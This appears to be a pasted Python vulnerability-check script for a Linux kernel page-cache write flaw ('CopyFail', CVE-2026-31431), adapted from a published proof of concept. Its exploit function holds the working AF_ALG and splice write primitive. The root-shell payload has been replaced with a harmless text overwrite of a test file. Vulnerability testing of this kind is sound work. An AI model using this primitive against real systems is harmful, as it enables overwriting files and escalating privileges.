CopyFail test script without root
A more readable version of the CopyFail PoC script from Theori's GitHub. It has the setuid payload replaced with a simple text payload, so it does not produce a root shell. CVE-2026-31431
unknown
python
a day ago
1.9 kB
111
Indexable
import os
import socket
from traceback import format_tb
ZERO = b"\x00"
def exploit(file, offset, data):
"""This is the copy fail exploit itself from the original proof of
concept, but reformatted for better readability.
"""
aead = socket.socket(38, 5, 0)
aead.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
aead.setsockopt(279, 1, b"\x08\x00\x01\x00\x00\x00\x00\x10" + ZERO*32)
aead.setsockopt(279, 5, None, 4)
dest, _ = aead.accept()
count = offset + 4
dest.sendmsg(
[b"AAAA" + data],
[(279, 3, ZERO*4), (279, 2, b"\x10" + ZERO*19), (279, 4, b"\x08" + ZERO*3)],
32768
)
p1, p2 = os.pipe()
os.splice(file, p2, count, offset_src=0)
os.splice(p1, dest.fileno(), count)
try:
dest.recv(8 + offset)
except Exception:
pass
# Write an example file we want to be compromised by the exploit
# This file serves no purpose and is a plain text file, so no harm done
f1 = open("check_copy_fail.txt", mode="w+b")
f1.write(b"I'm Fine! :)")
f1.close()
# Run the exploit on the test file
# This will overwrite the file content in the page cache
i = 0
payload = b"Vulnerable!!"
f2 = os.open("check_copy_fail.txt", 0)
try:
while i < len(payload):
exploit(f2, i, payload[i:i+4])
i += 4
except FileNotFoundError as e:
print("The exploit reported:")
print("\n".join(format_tb(e.__traceback__)).rstrip())
print(f"{e.__class__.__name__}: {e!s}")
print("The aead module seems to be disabled.")
# Now, check the content of the file:
# - If the system is vulnerable, the print should return "Vulnerable!!"
# - If the system is patched, the print should return the real content of the file, which is "I'm Fine! :)"
f3 = open("check_copy_fail.txt")
print(f3.read())
f3.close()
# Delete the file afterwards
os.unlink("check_copy_fail.txt")
Editor is loading...
Leave a Comment